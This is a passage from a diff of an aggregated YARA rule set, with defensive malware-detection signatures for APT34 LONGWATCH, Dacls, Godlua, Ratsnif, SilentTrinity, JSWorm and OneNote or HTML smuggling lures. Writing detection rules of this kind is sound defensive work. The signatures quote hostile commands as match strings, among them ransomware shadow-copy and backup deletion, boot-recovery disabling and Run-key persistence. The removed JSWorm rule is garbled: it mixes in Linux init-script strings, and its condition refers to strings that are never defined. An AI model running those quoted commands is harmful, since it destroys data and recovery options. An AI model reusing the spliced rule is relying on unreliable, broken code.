"2019-07-22" + reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_LONGWATCH.yara#L1-L43" + license_url = "N/A" + logic_hash = "8f9ed228325800baea3a2874c71337709c04d93419d4d56821a791dbce6f4582" + score = 75 + quality = 78 + tags = "APT34, WINMALWARE, KEYLOGGER, FILE" + Description = "APT34 Keylogger" + + strings: + $log = "c:\\windows\\temp\\log.txt" ascii fullword + $clipboard = "---------------CLIPBOARD------------" ascii fullword + $func0 = "\"Main Invoked.\"" ascii fullword + $func1 = "\"Main Returned.\"" ascii fullword + $logger3 = ">---------------------------------------------------" ascii fullword + $logger4 = "[ENTER]" ascii fullword + $logger5 = "[CapsLock]" ascii fullword + $logger6 = "[CRTL]" ascii fullword + $logger7 = "[PAGE_UP]" ascii fullword + $logger8 = "[PAGE_DOWN]" ascii fullword + $logger9 = "[HOME]" ascii fullword + $logger10 = "[LEFT]" ascii fullword + $logger11 = "[RIGHT]" ascii fullword + $logger12 = "[DOWN]" ascii fullword + $logger13 = "[PRINT]" ascii fullword + $logger14 = "[PRINT SCREEN]" ascii fullword + $logger15 = "[INSERT]" ascii fullword + $logger16 = "[SLEEP]" ascii fullword + $logger17 = "[PAUSE]" ascii fullword + $logger18 = "[TAB]" ascii fullword + $logger19 = "[ESC]" ascii fullword + $logger20 = "[DEL]" ascii fullword + $logger21 = "[ALT]" ascii fullword + + condition: + uint16(0)==0x5a4d and $log and all of ($func*) and all of ($logger*) and $clipboard +} +rule DEADBITS_Dacls_Trojan_Windows : FILE +{ + meta: + description = "No description has been set in the source file - DeadBits" + author = "Adam Swanda" + id = "424b2c0d-2373-5a72-9a97-52b4bfc5cdcf" + date = "2020-01-07" + modified = "2020-01-07" + reference = "https://github.com/deadbits/yara-rules" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Windows.yara#L1-L30" + license_url = "N/A" + logic_hash = "b77df7e3be9c264d6a63d40dbf49c41e9dd55b4e570c063b5710b849c36cc166" + score = 75 + quality = 80 + tags = "FILE" + Author = "Adam M. Swanda" + + strings: + $fext00 = ".exe" ascii wide + $fext01 = ".cmd" ascii wide + $fext02 = ".bat" ascii wide + $fext03 = ".com" ascii wide + $str00 = "Software\\mthjk" ascii wide + $str01 = "WindowsNT.dll" ascii fullword + $str02 = "GET %s HTTP/1.1" ascii fullword + $str03 = "content-length:" ascii fullword + $str04 = "Connection: keep-alive" ascii fullword + $cls00 = "c_2910.cls" ascii fullword + $cls01 = "k_3872.cls" ascii fullword + + condition: + ( uint16(0)==0x5a4d) and (( all of ($cls*)) or ( all of ($fext*) and all of ($str*))) } rule DEADBITS_Watchdog_Botnet : BOTNET LINUXMALWARE EXPLOITATION CVE_2019_11581 CVE_2019_10149 { @@ -117934,262 +119892,116 @@ rule DEADBITS_Crescentcore_DMG : INSTALLER MACOSMALWARE FILE condition: ( uint32(0)==0xfeedface or uint32(0)==0xcefaedfe or uint32(0)==0xfeedfacf or uint32(0)==0xcffaedfe or uint32(0)==0xbebafeca) and $header0 and $header1 and (($path0 and ( any of ($install*))) or (5 of ($str*))) or all of them } -rule DEADBITS_TA505_Flowerpippi : TA505 FINANCIAL BACKDOOR WINMALWARE FILE +rule DEADBITS_Godlua_Linux : LINUXMALWARE FILE { meta: description = "No description has been set in the source file - DeadBits" author = "Adam Swanda" - id = "1cfcb25e-1de9-53ac-b272-22792844a2d0" + id = "1a05c88a-8199-5c6d-9352-9ef60df40078" date = "2019-07-18" modified = "2019-07-22" reference = "https://github.com/deadbits/yara-rules" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/TA505_FlowerPippi.yara#L1-L65" - license_url = "N/A" - logic_hash = "eb709915f67d7225b024da99bc84a21455f3b9d5fb4bc779bbdf6a4d3ab33489" - score = 75 - quality = 24 - tags = "TA505, FINANCIAL, BACKDOOR, WINMALWARE, FILE" - Author = "Adam M. Swanda" - - strings: - $pipi = "pipipipip" ascii fullword - $pdb0 = "Loader.pdb" ascii fullword - $str0 = "bot.php" ascii fullword - $str1 = "%.2X" ascii fullword - $str2 = "sd.bat" ascii fullword - $str3 = "open" ascii fullword - $str4 = "domain" ascii fullword - $str5 = "proxy" ascii fullword - $str6 = ".exe" ascii fullword - $str7 = "Can't launch EXE file" ascii fullword - $str8 = "Can't load file" ascii fullword - $str9 = ".dll" ascii fullword - $str10 = "Dll function not found" ascii fullword - $str11 = "Can't load Dll" ascii fullword - $str12 = "__start_session__" ascii fullword - $str13 = "__failed__" ascii fullword - $str14 = "RSDSG" ascii fullword - $str15 = "ProxyServer" ascii fullword - $str16 = ":Repeat" ascii fullword - $str17 = "del \"%s\"" ascii fullword - $str18 = "if exist \"%s\" goto Repeat" ascii fullword - $str19 = "rmdir \"%s" ascii fullword - $str20 = "del \"%s\"" ascii fullword - $str21 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii fullword - $str22 = "ProxyEnable" ascii fullword - $str23 = ".00cfg" ascii fullword - $str24 = ".idata" ascii fullword - $api0 = "IsProcessorFeaturePresent" ascii fullword - $api1 = "IsDebuggerPresent" ascii fullword - $api2 = "HttpOpenRequestA" ascii fullword - $api3 = "InternetCrackUrlA" ascii fullword - $api4 = "InternetOpenW" ascii fullword - $api5 = "HttpSendRequestW" ascii fullword - $api6 = "InternetCloseHandle" ascii fullword - $api7 = "InternetConnectA" ascii fullword - $api8 = "InternetSetOptionW" ascii fullword - $api9 = "InternetReadFile" ascii fullword - $api10 = "WININET.dll" ascii fullword - $api11 = "URLDownloadToFileA" ascii fullword - - condition: - uint16(0)==0x5a4d and filesize <700KB and ((10 of ($str*) and $pipi) or (10 of ($str*) and $pdb0) or (10 of ($str*) and 5 of ($api*)) or ( all of them )) -} -rule DEADBITS_APT34_LONGWATCH : APT34 WINMALWARE KEYLOGGER FILE -{ - meta: - description = "No description has been set in the source file - DeadBits" - author = "Adam Swanda" - id = "74a6a408-2f0e-567d-8968-c304d258df81" - date = "2019-07-22" - modified = "2019-07-22" - reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_LONGWATCH.yara#L1-L43" - license_url = "N/A" - logic_hash = "8f9ed228325800baea3a2874c71337709c04d93419d4d56821a791dbce6f4582" - score = 75 - quality = 78 - tags = "APT34, WINMALWARE, KEYLOGGER, FILE" - Description = "APT34 Keylogger" - - strings: - $log = "c:\\windows\\temp\\log.txt" ascii fullword - $clipboard = "---------------CLIPBOARD------------" ascii fullword - $func0 = "\"Main Invoked.\"" ascii fullword - $func1 = "\"Main Returned.\"" ascii fullword - $logger3 = ">---------------------------------------------------" ascii fullword - $logger4 = "[ENTER]" ascii fullword - $logger5 = "[CapsLock]" ascii fullword - $logger6 = "[CRTL]" ascii fullword - $logger7 = "[PAGE_UP]" ascii fullword - $logger8 = "[PAGE_DOWN]" ascii fullword - $logger9 = "[HOME]" ascii fullword - $logger10 = "[LEFT]" ascii fullword - $logger11 = "[RIGHT]" ascii fullword - $logger12 = "[DOWN]" ascii fullword - $logger13 = "[PRINT]" ascii fullword - $logger14 = "[PRINT SCREEN]" ascii fullword - $logger15 = "[INSERT]" ascii fullword - $logger16 = "[SLEEP]" ascii fullword - $logger17 = "[PAUSE]" ascii fullword - $logger18 = "[TAB]" ascii fullword - $logger19 = "[ESC]" ascii fullword - $logger20 = "[DEL]" ascii fullword - $logger21 = "[ALT]" ascii fullword - - condition: - uint16(0)==0x5a4d and $log and all of ($func*) and all of ($logger*) and $clipboard -} -rule DEADBITS_Jsworm : MALWARE FILE -{ - meta: - description = "No description has been set in the source file - DeadBits" - author = "Adam Swanda" - id = "6d452d04-b475-5241-890c-68119a7a8691" - date = "2019-09-06" - modified = "2019-09-06" - reference = "https://github.com/deadbits/yara-rules/" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/JSWorm.yara#L1-L38" - license_url = "N/A" - logic_hash = "99074e25ec15c5b25fa41bef19203f5ddc227acd51fadca1e2c3ece538b3da01" - score = 75 - quality = 78 - tags = "MALWARE, FILE" - - strings: - $name00 = "JSWORM" nocase - $str00 = "DECRYPT.txt" nocase - $str02 = "cmd.exe" - $str03 = "/c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\" - $str04 = /\/c taskkill.exe taskkill \/f \/im (store|sqlserver|dns|sqlwriter)\.exe/ - $str05 = "/c start C:\\ProgramData\\" - $str06 = "/c vssadmin.exe delete shadows /all /quiet" - $str07 = "/c bcdedit /set {default} bootstatuspolicy ignoreallfailures -y" - $str08 = "/c bcdedit /set {default} recoveryenabled No -y" - $str09 = "/c wbadmin delete catalog -quiet" - $str10 = "/c wmic shadowcopy delete -y" - $uniq00 = "fuckav" - $uniq01 = "DECRYPT.hta" nocase - $uniq02 = "Backup e-mail for contact :" - $uniq03 = "&2; ;;" ascii fullword - $str011 = "esac" ascii fullword - $str012 = "[ -x /usr/local/bin/update-notifier ] \\" ascii fullword - $str013 = " && exec /usr/local/bin/update-notifier" ascii fullword - $rcd01 = "/etc/rc2.d/S01update-notifier" ascii fullword - $rcd02 = "/etc/rc3.d/S01update-notifier" ascii fullword - $rcd03 = "/etc/rc5.d/S01update-notifier" ascii fullword - - condition: - ( uint32be(0x0)==0x7f454c46) and (($ua_str and all of ($header*) and $initd and all of ($rcd*)) or ($ua_str and all of ($header*) and 10 of ($str*))) -} -rule DEADBITS_Dacls_Trojan_Linux -{ - meta: - description = "No description has been set in the source file - DeadBits" - author = "Adam Swanda" - id = "bb83ba2b-70a3-5a0f-9588-d93b7f07f67f" - date = "2020-01-07" - modified = "2020-01-07" - reference = "https://github.com/deadbits/yara-rules" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Linux.yara#L1-L32" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/godlua_linux.yara#L1-L57" license_url = "N/A" - logic_hash = "752d7daf9178e4fa20f2ce781c6ff70f83758f01479696f0808e1588da9a3d78" + logic_hash = "70a8078f261648f050807e82009493e39fa32c0748576b3df76d8aaaa117103e" score = 75 - quality = 80 - tags = "" + quality = 51 + tags = "LINUXMALWARE, FILE" Author = "Adam M. Swanda" strings: - $cls00 = "c_2910.cls" ascii fullword - $cls01 = "k_3872.cls" ascii fullword - $str00 = "{\"result\":\"ok\"}" ascii fullword - $str01 = "SCAN %s %d.%d.%d.%d %d" ascii fullword - $str02 = "/var/run/init.pid" ascii fullword - $str03 = "/flash/bin/mountd" ascii fullword - $str04 = "Name:" ascii fullword - $str05 = "Uid:" ascii fullword - $str06 = "Gid:" ascii fullword - $str08 = "PPid:" ascii fullword - $str09 = "session_id" ascii fullword + $tmp0 = "/tmp" ascii fullword + $tmp1 = "TMPDIR" ascii + $str1 = "\"description\": \"" ascii fullword + $str2 = "searchers" ascii fullword + $str3 = "/dev/misc/watchdog" ascii fullword + $str4 = "/dev/wdt" ascii fullword + $str5 = "/dev/misc/wdt" + $str6 = "lcurl.safe" ascii fullword + $str7 = "luachild" ascii fullword + $str8 = "cjson.safe" ascii fullword + $str9 = "HostUrl" ascii fullword + $str10 = "HostConnect" ascii fullword + $str11 = "LUABOX" ascii fullword + $str12 = "Infinity" ascii fullword + $str13 = "/bin/sh" ascii fullword + $str14 = /\.onion(\.)?/ ascii fullword + $str15 = "/etc/resolv.conf" ascii fullword + $str16 = "hosts:" ascii fullword + $resolvers = /([0-9]{1,3}\.){3}[0-9]{1,3}:53,([0-9]{1,3}\.){3}[0-9]{1,3},([0-9]{1,3}\.){3}[0-9]{1,3}:5353,([0-9]{1,3}\.){3}[0-9]{1,3}:443/ ascii + $identifier0 = "$LuaVersion: God " ascii + $identifier1 = /fbi\/d\.\/d.\/d/ ascii + $identifier2 = "Copyright (C) FBI Systems, 2012-2019, https://fbi.gov" fullword ascii + $identifier3 = "God 5.1" condition: - uint32be(0x0)==0x7f454c46 and (( all of ($cls*)) or ( all of ($str*))) + uint16(0)==0x457f and ( all of them or ( any of ($identifier*) and $resolvers and any of ($tmp*) and 4 of ($str*)) or ( any of ($identifier*) and any of ($tmp*) and 4 of ($str*))) } -rule DEADBITS_Redghost_Linux : POSTEXPLOITATION LINUXMALWARE +rule DEADBITS_APT32_Ratsnif : APT32 TROJAN WINMALWARE FILE { meta: description = "No description has been set in the source file - DeadBits" author = "Adam Swanda" - id = "f598e115-f821-5932-aa14-5254bf28092c" - date = "2019-08-07" + id = "d3664a84-bb53-5715-8b0d-e63f43d62496" + date = "2019-07-18" modified = "2019-08-08" - reference = "https://github.com/d4rk007/RedGhost/" - source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/RedGhost_Linux.yara#L1-L45" + reference = "https://github.com/deadbits/yara-rules" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT32_Ratsnif.yara#L1-L65" license_url = "N/A" - logic_hash = "0b12a0eda0a3b65c3da787770afb010eb5cd36426d41c04aca862ae1b01ab770" + logic_hash = "a33eb2bb9ffe02f9b3fe706bd6a611457c669adc24c34f12d9014ed29ba1399f" score = 75 - quality = 80 - tags = "POSTEXPLOITATION, LINUXMALWARE" + quality = 55 + tags = "APT32, TROJAN, WINMALWARE, FILE" Author = "Adam M. Swanda" strings: - $name = "[ R E D G H O S T - P O S T E X P L O I T - T O O L]" ascii - $feature0 = "Payloads" ascii - $feature1 = "SudoInject" ascii - $feature2 = "lsInject" ascii - $feature3 = "Crontab" ascii - $feature4 = "GetRoot" ascii - $feature5 = "Clearlogs" ascii - $feature6 = "MassinfoGrab" ascii - $feature7 = "CheckVM" ascii - $feature8 = "MemoryExec" ascii - $feature9 = "BanIP" ascii - $func0 = "checkVM(){" ascii - $func1 = "memoryexec(){" ascii - $func2 = "banip(){" ascii - $func3 = "linprivesc(){" ascii - $func4 = "dirty(){" ascii - $func5 = "Ocr(){" ascii - $func6 = "clearlog(){" ascii - $func7 = "conmethods(){" ascii - $func8 = "add2sys(){" ascii + $pdb0 = "X:\\Project\\BotFrame\\Debug\\Client.pdb" ascii fullword + $str1 = "LastIP" ascii fullword + $str2 = "LastOnline" ascii fullword + $str3 = "LoaderType" ascii fullword + $str4 = "Payload" ascii fullword + $str5 = "PayloadFile" ascii fullword + $str6 = "ClientCommand" ascii fullword + $str7 = "ClientId" ascii fullword + $str8 = "UserAdmin" ascii fullword + $str9 = "User" ascii fullword + $str10 = "Password" ascii fullword + $str11 = "Access" ascii fullword + $str12 = "CreateDate" ascii fullword + $str13 = "CreateBy" ascii fullword + $str14 = "UserName" ascii fullword + $str15 = "ComputerName" ascii fullword + $str16 = "Domain" ascii fullword + $str17 = "OSType" ascii fullword + $str18 = "OSArch" ascii fullword + $str19 = "OSVer" ascii fullword + $str20 = "InstallDate" ascii fullword + $str21 = "LastLoadCommandID" ascii fullword + $str22 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" ascii fullword + $str25 = "#########################Program starting up#########################" ascii fullword + $str26 = "Stop poison" ascii fullword + $str27 = "Shell:" ascii fullword + $str28 = "shell" ascii fullword + $str29 = "Select http redirect domain:" ascii fullword + $str30 = "HTTP redirect add file extension:" ascii fullword + $str32 = "exIp" ascii fullword + $str33 = "Start Poison" ascii fullword + $str34 = "vicIP" ascii fullword + $str35 = "Insert JSTag" ascii fullword + $str36 = "devIp" ascii fullword + $str37 = "TransmitTcp" ascii fullword + $str38 = "Remove poison IP: %s" ascii fullword + $str39 = "Remove my ip or gateway ip: %s" ascii fullword + $cnc0 = "/cl_client_online.php" ascii fullword + $cnc1 = "/cl_client_cmd.php" ascii fullword + $cnc2 = "/cl_client_cmd_res.php" ascii fullword + $cnc3 = "/cl_client_file_download.php" ascii fullword + $cnc4 = "/ad_file_download.php" ascii fullword + $cnc5 = "/cl_client_file_upload.php" ascii fullword + $cnc6 = "/cl_client_logs.php" ascii fullword condition: - ( uint16be(0x0)==0x2321 and for any i in (0..64) : ( uint16be(i)==0x2f62 and uint8(i+2)==0x68)) and ($name or 5 of them ) + ( uint16(0)==0x5a4d) and ((10 of ($str*) and 3 of ($cnc*)) or (3 of ($cnc*) and $pdb0)) } rule DEADBITS_Dnspionage : APT DNSCHANGER FILE { @@ -118238,11 +120050,67 @@ rule DEADBITS_Dnspionage : APT DNSCHANGER FILE condition: uint16(0)==0x5a4d and filesize <1000KB and ((5 of ($str*)) or ($x00 and (1 of ($hdr*)) and 1 of ($ua*))) } +rule DEADBITS_Silenttrinity : FILE +{ + meta: + description = "No description has been set in the source file - DeadBits" + author = "Adam Swanda" + id = "40f9174c-e9a5-5453-b5fa-6c01c46daffa" + date = "2019-07-19" + modified = "2019-07-19" + reference = "https://countercept.com/blog/hunting-for-silenttrinity/" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Payload.yara#L1-L55" + license_url = "N/A" + logic_hash = "7fd1775aadfccfdf141c0721f557e6c54b058ac17a59a8e4561dd62ab4a1eff3" + score = 75 + quality = 78 + tags = "FILE" + Description = "Attempts to detect the SilentTrinity malware family" + Author = "Adam M. Swanda" + + strings: + $pdb01 = "SILENTTRINITY.pdb" ascii + $str01 = "Found {0} in zip" ascii fullword + $str02 = "{0} not in zip file" ascii fullword + $str03 = "Invalid HMAC: {0}" ascii fullword + $str04 = "Attempting HTTP GET to {0}" ascii fullword + $str05 = "Downloaded {0} bytes" ascii fullword + $str06 = "Error downloading {0}: {1}" ascii fullword + $str07 = "Attempting HTTP POST to {0}" ascii fullword + $str08 = "POST" ascii fullword + $str09 = "application/octet-stream" ascii fullword + $str10 = "Error sending job results to {0}: {1}" ascii fullword + $str11 = ".dll" ascii fullword + $str12 = "Trying to resolve assemblies by staging zip" ascii fullword + $str13 = "'{0}' loaded" ascii fullword + $str14 = "Usage: SILENTTRINITY.exe []" ascii fullword + $str15 = "IronPython.dll" ascii fullword + $str16 = "IronPythonDLL" ascii fullword + $str17 = "DEBUG" ascii fullword + $str18 = "Main.py" ascii fullword + $str19 = "Execute" ascii fullword + $str20 = "SILENTTRINITY.Properties.Resources" ascii fullword + $str21 = ".zip" ascii fullword + $a00 = "HttpGet" ascii fullword + $a01 = "System.Net" ascii fullword + $a02 = "Target" ascii fullword + $a03 = "WebClient" ascii fullword + $a04 = "get_Current" ascii fullword + $a05 = "Endpoint" ascii fullword + $a06 = "AesDecrypt" ascii fullword + $a07 = "AesEncrypt" ascii fullword + $a08 = "cert" ascii fullword + $a09 = "WebRequest" ascii fullword + $a10 = "HttpPost" ascii fullword + + condition: + uint16(0)==0x5a4d and ((8 of ($str*) or ( all of ($a*) and $pdb01) or $pdb01)) +} /* * YARA Rule Set * Repository Name: DelivrTo * Repository: https://github.com/delivr-to/detections - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 92f96221fcc0c589295c47511a7bfcc4cf63768c * Number of Rules: 7 * Skipped: 0 (age), 2 (quality), 0 (score), 0 (importance) @@ -118252,28 +120120,53 @@ rule DEADBITS_Dnspionage : APT DNSCHANGER FILE * * NO LICENSE SET */ -rule DELIVRTO_SUSP_ZPAQ_Archive_Nov23 : FILE +rule DELIVRTO_SUSP_HTML_WASM_Smuggling { meta: - description = "ZPAQ file archive with expected file and block headers" + description = "Presence of Base64 JavaScript blob loading WASM" author = "delivr.to" - id = "28b6ffbe-be95-5ac8-ad3e-f9713a204d98" - date = "2023-11-26" - modified = "2023-11-27" - reference = "https://www.gdatasoftware.com/blog/2023/11/37822-agent-tesla-zpaq" - source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/zpaq_archives.yar#L1-L14" + id = "fc83bb4f-ba8a-52d2-b9ce-632da5341f77" + date = "2024-02-28" + modified = "2024-05-24" + reference = "https://github.com/delivr-to/detections" + source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/html_wasm.yar#L1-L13" license_url = "N/A" - logic_hash = "348144ee7137def00b37e074507e8148e51d34c484802a56bcd6e090d4628f18" - score = 40 + logic_hash = "4bca88862c28db947c04c40e40fdecc682223d1eb90c98350fbd6c5d8c6c4636" + score = 70 quality = 80 + tags = "" + + strings: + $wasm = "WebAssembly.Module" base64 + $int = "WebAssembly.Instance" base64 + $inst = "WebAssembly.instantiate" base64 + + condition: + all of them +} +rule DELIVRTO_SUSP_Onenote_Win_Script_Encoding_Feb23 : FILE +{ + meta: + description = "Presence of Windows Script Encoding Header in a OneNote file with embedded files" + author = "delivr.to" + id = "95cd5ce0-07b3-5503-ad6f-944206bd4fb6" + date = "2023-02-19" + modified = "2023-02-19" + reference = "https://github.com/delivr-to/detections" + source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/onenote_windows_script_encoding_file.yar#L1-L22" + license_url = "N/A" + logic_hash = "b7068f551b3665358f461a076c2d46c82db558d7fa4acb7d3c9c5c2afce31253" + score = 60 + quality = 78 tags = "FILE" strings: - $fh = { 37 6B 53 74 A0 31 83 D3 8C B2 28 B0 D3 } - $block_header = /jDC\d{14}[cdhi]\d{10}/ + $one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 } + $fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac } + $wse = { 23 40 7E 5E } condition: - $fh at 0 and $block_header + filesize <5MB and ($one at 0) and $fdso and $wse } rule DELIVRTO_SUSP_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE { @@ -118298,77 +120191,76 @@ rule DELIVRTO_SUSP_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE condition: uint32be(0)==0xD0CF11E0 and uint32be(4)==0xA1B11AE1 and $app and $rfp } -rule DELIVRTO_SUSP_Onenote_Win_Script_Encoding_Feb23 : FILE +rule DELIVRTO_SUSP_ZPAQ_Archive_Nov23 : FILE { meta: - description = "Presence of Windows Script Encoding Header in a OneNote file with embedded files" + description = "ZPAQ file archive with expected file and block headers" author = "delivr.to" - id = "95cd5ce0-07b3-5503-ad6f-944206bd4fb6" - date = "2023-02-19" - modified = "2023-02-19" - reference = "https://github.com/delivr-to/detections" - source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/onenote_windows_script_encoding_file.yar#L1-L22" + id = "28b6ffbe-be95-5ac8-ad3e-f9713a204d98" + date = "2023-11-26" + modified = "2023-11-27" + reference = "https://www.gdatasoftware.com/blog/2023/11/37822-agent-tesla-zpaq" + source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/zpaq_archives.yar#L1-L14" license_url = "N/A" - logic_hash = "b7068f551b3665358f461a076c2d46c82db558d7fa4acb7d3c9c5c2afce31253" - score = 60 - quality = 78 + logic_hash = "348144ee7137def00b37e074507e8148e51d34c484802a56bcd6e090d4628f18" + score = 40 + quality = 80 tags = "FILE" strings: - $one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 } - $fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac } - $wse = { 23 40 7E 5E } + $fh = { 37 6B 53 74 A0 31 83 D3 8C B2 28 B0 D3 } + $block_header = /jDC\d{14}[cdhi]\d{10}/ condition: - filesize <5MB and ($one at 0) and $fdso and $wse + $fh at 0 and $block_header } -rule DELIVRTO_SUSP_HTML_WASM_Smuggling +rule DELIVRTO_SUSP_Onenote_Repeated_Filedatareference_Feb23 : FILE { meta: - description = "Presence of Base64 JavaScript blob loading WASM" + description = "Repeated references to files embedded in OneNote file. May indicate multiple copies of file hidden under image, as leveraged by Qakbot et al." author = "delivr.to" - id = "fc83bb4f-ba8a-52d2-b9ce-632da5341f77" - date = "2024-02-28" - modified = "2024-05-24" + id = "2a46d6cc-2800-5645-889c-7ad7d7aa69bd" + date = "2023-02-17" + modified = "2023-02-17" reference = "https://github.com/delivr-to/detections" - source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/html_wasm.yar#L1-L13" + source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/onenote_repeated_files.yar#L1-L23" license_url = "N/A" - logic_hash = "4bca88862c28db947c04c40e40fdecc682223d1eb90c98350fbd6c5d8c6c4636" - score = 70 + logic_hash = "ef74a128de4d3745af856957931eaae0c0ae5a5583eab1a7c58d6dd666e7fd15" + score = 60 quality = 80 - tags = "" + tags = "FILE" strings: - $wasm = "WebAssembly.Module" base64 - $int = "WebAssembly.Instance" base64 - $inst = "WebAssembly.instantiate" base64 + $one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 } + $fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac } + $fref = { 3C 00 69 00 66 00 6E 00 64 00 66 00 3E 00 7B 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? } condition: - all of them + filesize <5MB and ($one at 0) and $fdso and #fref>(#fdso*4) } -rule DELIVRTO_SUSP_Onenote_Repeated_Filedatareference_Feb23 : FILE +rule DELIVRTO_SUSP_Onenote_RTLO_Character_Feb23 : FILE { meta: - description = "Repeated references to files embedded in OneNote file. May indicate multiple copies of file hidden under image, as leveraged by Qakbot et al." + description = "Presence of RTLO Unicode Character in a OneNote file with embedded files" author = "delivr.to" - id = "2a46d6cc-2800-5645-889c-7ad7d7aa69bd" + id = "03d86391-1392-5734-af5f-8a2c7b99167a" date = "2023-02-17" modified = "2023-02-17" reference = "https://github.com/delivr-to/detections" - source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/onenote_repeated_files.yar#L1-L23" + source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/onenote_rtlo_filename.yar#L1-L22" license_url = "N/A" - logic_hash = "ef74a128de4d3745af856957931eaae0c0ae5a5583eab1a7c58d6dd666e7fd15" + logic_hash = "286bc1ab1f5df0d64634f53cc82357187306c40b063b156f36b602e131262c7a" score = 60 - quality = 80 + quality = 55 tags = "FILE" strings: $one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 } $fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac } - $fref = { 3C 00 69 00 66 00 6E 00 64 00 66 00 3E 00 7B 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 2D 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? } + $rtlo = { 00 2E 20 } condition: - filesize <5MB and ($one at 0) and $fdso and #fref>(#fdso*4) + filesize <5MB and ($one at 0) and $fdso and $rtlo } rule DELIVRTO_SUSP_PDF_MHT_Activemime_Sept23 : FILE { @@ -118395,36 +120287,12 @@ rule DELIVRTO_SUSP_PDF_MHT_Activemime_Sept23 : FILE condition: uint32(0)==0x46445025 and all of ($mht*) and $act } -rule DELIVRTO_SUSP_Onenote_RTLO_Character_Feb23 : FILE -{ - meta: - description = "Presence of RTLO Unicode Character in a OneNote file with embedded files" - author = "delivr.to" - id = "03d86391-1392-5734-af5f-8a2c7b99167a" - date = "2023-02-17" - modified = "2023-02-17" - reference = "https://github.com/delivr-to/detections" - source_url = "https://github.com/delivr-to/detections/blob/92f96221fcc0c589295c47511a7bfcc4cf63768c/yara-rules/onenote_rtlo_filename.yar#L1-L22" - license_url = "N/A" - logic_hash = "286bc1ab1f5df0d64634f53cc82357187306c40b063b156f36b602e131262c7a" - score = 60 - quality = 55 - tags = "FILE" - - strings: - $one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 } - $fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac } - $rtlo = { 00 2E 20 } - - condition: - filesize <5MB and ($one at 0) and $fdso and $rtlo -} /* * YARA Rule Set * Repository Name: ESET * Repository: https://github.com/eset/malware-ioc - * Retrieval Date: 2024-09-08 - * Git Commit: 9b299fc90dc027a039652a8a4ac487ade0a381dd + * Retrieval Date: 2024-09-29 + * Git Commit: 5cca240b5eb0860e011164b35b343cb84059bf02 * Number of Rules: 98 * Skipped: 0 